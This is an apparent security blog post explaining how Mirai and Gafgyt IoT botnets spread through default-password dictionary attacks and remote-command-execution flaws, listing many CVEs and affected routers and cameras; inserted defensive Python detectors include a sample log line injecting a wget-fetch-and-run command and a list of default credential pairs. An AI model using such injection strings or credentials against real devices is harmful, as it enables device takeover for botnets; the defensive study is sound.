2019. 6. 14. 14:18 Malware Analysis

List



1. Tools

- Ollydbg 2.01 manual [ http://sanseolab.tistory.com/8 ]
- Windbg and Gdb command summary [ http://sanseolab.tistory.com/22 ]
- VC++ options summary [ http://sanseolab.tistory.com/20 ]
- How to use exeinfo PE [ http://sanseolab.tistory.com/48 ]
- x64dbg analysis tips [ http://sanseolab.tistory.com/54 ]
- Using and creating IDA Pro signatures (FLIRT) [ http://sanseolab.tistory.com/55 ]
- How to use GCC [ http://sanseolab.tistory.com/67 ]
- Dumping from a debugger [ http://sanseolab.tistory.com/73 ]
- Notepad++ automation [ http://sanseolab.tistory.com/74 ]
- TotalCommand automation [ http://sanseolab.tistory.com/75 ]



2. Security Concepts

- Code injection and user-mode hooking [ http://sanseolab.tistory.com/28 ]
- Exception handling in Windows [ http://sanseolab.tistory.com/16 ]
- Windows services [ http://sanseolab.tistory.com/18 ]
- API Sets [ http://sanseolab.tistory.com/17 ]
- Summary of Windows data types [ http://sanseolab.tistory.com/9 ]
- Script-based malware on Windows [ http://sanseolab.tistory.com/41 ]
- Malware analysis automation (sandboxes and emulators) [ http://sanseolab.tistory.com/39 ]
- Malware detection mechanisms of antivirus products [ http://sanseolab.tistory.com/35 ]
- Polymorphic viruses [ http://sanseolab.tistory.com/19 ]
- Malware persistence mechanisms [ http://sanseolab.tistory.com/30 ]
- PowerShell and malware [ http://sanseolab.tistory.com/29 ]
- Windows privileges and UAC (User Access Control) bypass [ http://sanseolab.tistory.com/27 ]
- How a malware infection unfolds [ http://sanseolab.tistory.com/26 ]
- The EFLAGS status register [ http://sanseolab.tistory.com/44 ]
- Anti-AV and Anti-VM (Sandbox) [ http://sanseolab.tistory.com/52 ]
- Summary of Access Tokens, privileges and Integrity Levels [ http://sanseolab.tistory.com/50 ]
- Concepts and use of COM, OLE, the .NET Framework, etc. [ http://sanseolab.tistory.com/49 ]
- Routines that use the TEB and PEB [ http://sanseolab.tistory.com/47 ]
- Process Hollowing and its applications [ http://sanseolab.tistory.com/57 ]
- CreateProcess / CreateThread internals [ http://sanseolab.tistory.com/58 ]
- System utilities that can be abused for malicious behavior [ http://sanseolab.tistory.com/66 ]
- Windows task scheduling and related topics [ http://sanseolab.tistory.com/68 ]
- batch (cmd) obfuscation [ https://sanseolab.tistory.com/76 ]
- .NET syntax used in PowerShell [ https://sanseolab.tistory.com/77 ]
- Propagation methods of Linux IoT malware [ https://sanseolab.tistory.com/78 ]



3. Analysis

- Analysis of packers [ http://sanseolab.tistory.com/10 ]
- Analysis of Yoda's Protector [ http://sanseolab.tistory.com/11 ]
- Analysis of the PEspin 1.33 protector [ http://sanseolab.tistory.com/34 ]
- Methodology for analyzing Delphi binaries [ http://sanseolab.tistory.com/56 ]
- AutoIt scripts [ http://sanseolab.tistory.com/59 ]
- Decompiling VBScript that has been converted to a binary [ http://sanseolab.tistory.com/60 ]
- Decompiling AutoHotKey by version [ http://sanseolab.tistory.com/61 ]
- Extracting scripts converted to binaries (VBScript, PowerShell, Batch) [ http://sanseolab.tistory.com/63 ]
- Analysis of Visual Basic 6.0 binaries [ http://sanseolab.tistory.com/64 ]
- Analysis of installers [ http://sanseolab.tistory.com/65 ]
- Analysis of USB malware [ http://sanseolab.tistory.com/42 ]



4. Development

- Developing a simple packer [ http://sanseolab.tistory.com/12 ]
- Windows driver development, rootkits, and AV [ http://sanseolab.tistory.com/13 ]
- Notes on implementing a Linux antivirus [ http://sanseolab.tistory.com/23 ]
- Practice developing a Windows antivirus driver [ http://sanseolab.tistory.com/33 ]
- A simple process logger implemented as a Windows driver (Process Logger) [ http://sanseolab.tistory.com/38 ]
- Practice classifying signatures with yara [ http://sanseolab.tistory.com/62 ]
- [Tool] ejExtractor [ http://sanseolab.tistory.com/72 ]



Posted by SanseoLab

 

Propagation methods of Linux IoT malware

1. Overview

Since the source code of malware such as Mirai and Gafgyt was made public, a large number of variants have been created and continue to appear. Most of these IoT malware families are functionally DDoS bots, and an effective DDoS attack requires a large botnet. In other words, besides their DDoS-related functions, these IoT DDoS bot families inevitably include functionality to scan for other vulnerable devices and, going further, to propagate the same malware to the vulnerable devices they identify.

This post covers two broad approaches: the dictionary attack used since the early versions, and the vulnerability exploitation techniques that account for the majority of later variants.

2. ID / PW Dictionary Attack

 

The following is the source code of Bashlite, an early version of Gafgyt. Looking at usernames and passwords, it contains IDs that are likely to exist by default, such as root, admin and user, and the passwords are likewise values such as root, toor and admin that an administrator who does not pay attention to security might set.
[ https://github.com/ifding/iot-malware/blob/master/BASHLITE/client.c ]

The StartTheLelz() function attempts to log in with the ID / PW values above to an IP address chosen at random by the getrandompublicip() function (private IP ranges and the like are excluded). Note that, unlike Mirai described below, it is very simple and has no propagation function of its own; instead it sends the IP and the ID / PW of each server it succeeded on to the C2 server.

The following is the publicly released early source code of the Mirai malware, which includes the default IDs and passwords.
[ https://github.com/jgamblin/Mirai-Source-Code/blob/master/mirai/bot/scanner.c ]

Like Bashlite it contains insecure ID / PW values, but it also contains the default IDs and passwords of IoT devices. Note that Mirai not only scans for such insecure devices but also includes functionality to propagate the Mirai malware to servers it successfully logs in to (busybox must also be installed on them).

The above was verified on the basis of the early source code, but later variants use many more ID / PW combinations (credential combinations). The following are links to analysis write-ups that mention this.
[ https://blog.avast.com/hacker-creates-seven-new-variants-of-the-mirai-botnet ]
[ https://www.imperva.com/blog/malware-analysis-mirai-ddos-botnet/ ]
[ https://medium.com/@ahmedjouini99/mirai-botnet-new-sophisticated-scanner-6ad9269c14 ]
[ https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/ ]
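The scanning behaviour described in this section leaves a characteristic trace on the defender's side: one source cycling through several distinct default ID / PW pairs within seconds. The following added example, which is not code from this post nor from Bashlite or Mirai, flags that pattern in constructed honeypot-style login records; the log format (`src=`, `user=`, `pass=`, `result=` fields), the window and threshold, and the weak-pair list are assumptions.

```python
# Added example (not from the original post, nor Bashlite/Mirai code): flag a
# source that cycles through many default ID / PW pairs in a short window.
# Assumes a honeypot-style login log, one attempt per line (format constructed).
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(r"^(?P<ts>\S+) src=(?P<src>[\d.]+) user=(?P<user>\S*) "
                     r"pass=(?P<pw>\S*) result=(?P<res>\w+)$")
# default / weak pairs of the kind the Bashlite and Mirai credential lists contain
WEAK_PAIRS = {("root", "root"), ("root", "toor"), ("root", "admin"),
              ("admin", "admin"), ("user", "user")}

def parse(line):
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return rec

def detect(lines, window=timedelta(minutes=5), min_pairs=4):
    """{src: summary} for sources trying >= min_pairs distinct pairs within window."""
    by_src = defaultdict(list)
    for rec in filter(None, map(parse, lines)):
        by_src[rec["src"]].append(rec)
    alerts = {}
    for src, recs in by_src.items():
        recs.sort(key=lambda r: r["ts"])
        for i, first in enumerate(recs):  # sliding window starting at each attempt
            in_win = [r for r in recs[i:] if r["ts"] - first["ts"] <= window]
            pairs = {(r["user"], r["pw"]) for r in in_win}
            if len(pairs) >= min_pairs:
                alerts[src] = {"distinct_pairs": len(pairs),
                               "weak_pairs": len(pairs & WEAK_PAIRS),
                               # a success after a spray means the device was taken over
                               "success": any(r["res"] == "success" for r in in_win)}
                break
    return alerts

SAMPLE_LOG = [  # constructed; 198.51.100.0/24 and 203.0.113.0/24 are documentation ranges
    "2019-06-14T03:12:07Z src=198.51.100.7 user=root pass=root result=fail",
    "2019-06-14T03:12:08Z src=198.51.100.7 user=root pass=toor result=fail",
    "2019-06-14T03:12:09Z src=198.51.100.7 user=admin pass=admin result=fail",
    "2019-06-14T03:12:10Z src=198.51.100.7 user=user pass=user result=fail",
    "2019-06-14T03:12:11Z src=198.51.100.7 user=root pass=admin result=success",
    "2019-06-14T03:40:00Z src=203.0.113.9 user=alice pass=s3cret result=fail",
    "2019-06-14T03:41:00Z src=203.0.113.9 user=alice pass=s3cret2 result=success",
]
```

Calling `detect(SAMPLE_LOG)` reports only 198.51.100.7, with all five pairs on the weak list and a final success; the ordinary user who mistypes once is not flagged.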

 

 

 

 

3. Vulnerabilities

Besides ID / PW dictionary attacks, if the target device has a vulnerability that allows malware to be downloaded and executed, propagation is possible through that vulnerability.

Palo Alto Networks has consistently published well-organized blog posts on these vulnerabilities, so linking to them would probably be enough. However, since the material is spread across several posts, this blog also gives a brief summary, both to condense it and so that later posts and further details can be added over time.

2018.07.20 - [ https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/ ]
2018.09.09 - [ https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/ ]
2019.03.18 - [ https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/ ]
2019.04.08 - [ https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/ ]
2019.06.06 - [ https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/ ]

As the summary below shows, most of these are Remote Command Execution vulnerabilities: a malicious command is executed by sending a crafted packet to the device remotely. In most cases the malware is then downloaded and executed with wget.
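The download-and-execute pattern just described can be looked for in the web access log of a device or of a reverse proxy in front of it. The following added example (not code from this post or from Unit 42) classifies constructed CLF-style access-log lines; the log format, the CGI path and parameter names, and the separator/downloader regexes are assumptions.

```python
# Added example: flag requests whose URL parameters chain a shell separator with a
# downloader, the "fetch with wget and run" shape the post describes. Log lines are
# constructed and the CLF access-log format is assumed.
import re
from urllib.parse import unquote_plus

# CLF line: client IP ... "METHOD path HTTP/x" status size (assumed format)
LINE_RE = re.compile(r'^(?P<src>\S+) .*?"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')
SEPARATORS = re.compile(r"[;|`&]|\$\(")          # shell metacharacters inside a value
DOWNLOADERS = re.compile(r"\b(wget|curl|tftp|ftpget)\b", re.I)
EXEC_HINTS = re.compile(r"\b(sh|bash|busybox|chmod)\b", re.I)

def classify(line):
    """Return a verdict dict for one access-log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    path = unquote_plus(unquote_plus(m.group("path")))  # decode twice: double-encoding is common
    has_sep, has_dl = bool(SEPARATORS.search(path)), bool(DOWNLOADERS.search(path))
    return {
        "src": m.group("src"),
        "path": path,
        # a downloader name alone (e.g. a docs URL) is not enough; it must follow a separator
        "suspicious": has_sep and has_dl,
        "exec_hint": bool(EXEC_HINTS.search(path)),
    }

def scan(lines):
    """Return only the classified records flagged as suspicious."""
    return [v for v in map(classify, lines) if v and v["suspicious"]]

SAMPLE_LOG = [  # constructed; 203.0.113.x / 192.0.2.x / 198.51.100.x are documentation ranges
    '203.0.113.5 - - [14/Jun/2019:03:20:11 +0000] "GET /cgi-bin/status.cgi?host=127.0.0.1;wget%20http://198.51.100.23/x.sh%20-O%20/tmp/x;sh%20/tmp/x HTTP/1.1" 200 512',
    '192.0.2.8 - - [14/Jun/2019:03:21:00 +0000] "GET /cgi-bin/status.cgi?host=192.0.2.1 HTTP/1.1" 200 512',
    '192.0.2.9 - - [14/Jun/2019:03:22:00 +0000] "GET /docs/wget-manual.html HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["src"], hit["path"])
```

POST bodies (for example HNAP or UPnP SOAP requests) are not written to an access log, so this only covers injections carried in the request URL.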


Linksys vulnerabilities

Vulnerability : Linksys Remote Command Execution
Target : Linksys E-series devices
Example : [ https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/ ]

Vulnerability : Linksys WAP54Gv3 Remote Debug Root Shell
Target : Linksys WAP54G Wireless Access Points
Example : [ https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/ ]

Vulnerability : CVE-2013-3568
Target : Linksys WRT100, WRT110 consumer routers
Example : [ https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/ ]

Vulnerability : Linksys apply.cgi Remote Command Execution
Target : Linksys E1500/E2500 routers
Example : [ https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/ ]

 

 

Netgear vulnerabilities

Vulnerability : Netgear setup.cgi unauthenticated Remote Command Execution
Target : Netgear DGN1000 routers
Example : [ https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/ ]

Vulnerability : Netgear cgi-bin Remote Command Execution
Target : Netgear R7000/R6400 devices
Example : [ https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/ ]

Vulnerability : CVE-2016-1555
Target : Netgear WG102, WG103, WN604, WNDAP350, WNDAP360, WNAP320, WNAP210, WNDAP660, WNDAP620 devices
Example : [ https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/ ]

Vulnerability : CVE-2017-6077, CVE-2017-6334
Target : Netgear DGN2200 N300 Wireless ADSL2+ Modem Routers
Example : [ https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/ ]

Vulnerability : Netgear Prosafe Remote Command Execution
Target : Netgear Prosafe WC9500, WC7600, WC7520 Wireless Controllers
Example : [ https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/ ]

Vulnerability : Netgear ReadyNAS Remote Command Execution / CVE-2018-15716
Target : Netgear ReadyNAS Surveillance 1.4.3-16 and NUUO NVRMini devices
Example : [ https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/ ]

 

 

D-Link vulnerabilities

Vulnerability : HNAP SoapAction-Header Remote Command Execution
Target : D-Link devices
Example : [ https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/ ]

Vulnerability : UPnP SOAP TelnetD Remote Command Execution
Target : D-Link devices
Example : [ https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/ ]

Vulnerability : D-Link command.php Remote Command Execution
Target : Some D-Link devices
Example : [ https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/ ]

Vulnerability : D-Link DCS-930L Remote Command Execution
Target : D-Link DCS-930L Network Video Cameras
Example : [ https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/ ]

Vulnerability : D-Link diagnostic.php Command Execution
Target : D-Link DIR-645, DIR-815 routers
Example : [ https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/ ]

Vulnerability : D-Link DSL2750B Remote Code Execution
Target : D-Link DSL2750B
Example : [ https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/ ]

 

 

Other vulnerabilities

Vulnerability : CVE-2018-10561, CVE-2018-10562 Remote Command Execution
Target : Dasan GPON routers
Example : [ https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/ ]

Vulnerability : CVE-2014-8361
Target : Various devices using the Realtek SDK with the miniigd daemon
Example : [ https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/ ]

Vulnerability : CVE-2017-17215
Target : Huawei HG532
Example : [ https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/ ]

Vulnerability : Eir WAN Side Remote Command Execution
Target : Eir D1000 routers
Example : [ https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/ ]

Vulnerability : CCTV/DVR Remote Command Execution
Target : CCTVs and DVRs from over 70 vendors
Example : [ https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/ ]

Vulnerability : JAWS Webserver unauthenticated shell command execution
Target : MVPower DVRs, among others
Example : [ https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/ ]

Vulnerability : Vacron NVR Remote Command Execution
Target : Vacron NVR devices
Example : [ https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/ ]

Vulnerability : EnGenius Remote Command Execution
Target : EnGenius EnShare IoT Gigabit Cloud Service 1.4.11
Example : [ https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/ ]

Vulnerability : AVTECH Unauthenticated Remote Command Execution
Target : AVTECH IP Camera/NVR/DVR devices
Example : [ https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/ ]

Vulnerability : CVE-2017-6884
Target : Zyxel routers
Example : [ https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/ ]

Vulnerability : NetGain 'ping' Command Injection
Target : NetGain Enterprise Manager 7.2.562
Example : [ https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/ ]

Vulnerability : NUUO OS Remote Command Execution
Target : NUUO NVRmini 2 3.0.8
Example : [ https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/ ]

Vulnerability : CVE-2018-17173
Target : LG Supersign TVs
Example : [ https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/ ]

Vulnerability : WePresent WiPG-1000 Remote Command Execution
Target : WePresent WiPG-1000 Wireless Presentation systems
Example : [ https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/ ]

Vulnerability : Zyxel P660HN Remote Command Execution
Target : Zyxel P660HN-T routers
Example : [ https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/ ]

Vulnerability : ZTE Remote Command Execution
Target : ZTE ZXV10 H108L routers with firmware <= V1.0.01_WIND_A01
Example : [ https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/ ]

Vulnerability : Apache Struts 2 Remote Command Execution / CVE-2017-5638
Target : Apache Struts versions 2.3.5 to 2.3.31, Apache Struts versions 2.5 to 2.5.10, Cisco products : https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170310-struts2
Example : [ https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/ ]

Vulnerability : SonicWall GMS Remote Command Execution / CVE-2018-9866
Target : SonicWall Global Management System (GMS) (8.1 and older)
Example : [ https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/ ]

Vulnerability : ThinkPHP Remote Command Execution / CVE-2018-20062
Target : ThinkPHP 5.x < v5.0.23
Example : [ https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/ ]

Vulnerability : CVE-2019-3929
Target : Wireless Presentation Systems from several vendors
Example : [ https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/ ]

Vulnerability : OpenDreamBox Remote Code Execution
Target : Devices running OpenDreamBox 2.0.0, an embedded Linux distribution for set-top boxes
Example : [ https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/ ]

Vulnerability : CVE-2018-6961
Target : VMware NSX SD-WAN Edge < 3.1.2
Example : [ https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/ ]

Vulnerability : CVE-2018-7841
Target : Schneider Electric U.motion LifeSpace Management Systems
Example : [ https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/ ]

Vulnerability : Dell KACE Remote Code Execution
Target : Dell KACE Systems Management Appliances
Example : [ https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/ ]

Vulnerability : CVE-2017-5174
Target : Geutebruck IP Cameras
Example : [ https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/ ]

Vulnerability : HooToo TripMate Remote Code Execution
Target : HooToo TripMate routers
Example : [ https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/ ]

Vulnerability : CVE-2018-11510
Target : Asustor NAS devices
Example : [ https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/ ]

Vulnerability : CVE-2019-2725
Target : Oracle WebLogic Servers
Example : [ https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/ ]

Vulnerability : ASUS DSL Modem Remote Code Execution
Target : ASUS DSL-N12E_C1 1.1.2.3_345
Example : [ https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/ ]

Vulnerability : Belkin WeMo Remote Code Execution
Target : Belkin WeMo devices
Example : [ https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/ ]

Vulnerability : MiCasa VeraLite Remote Code Execution
Target : MiCasa VeraLite Smart Home Controllers
Example : [ https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/ ]

Vulnerability : GoAhead Remote Code Execution
Target : IP cameras manufactured by GoAhead, Aldi, and several others
Example : [ https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/ ]

 

 

Posted by SanseoLab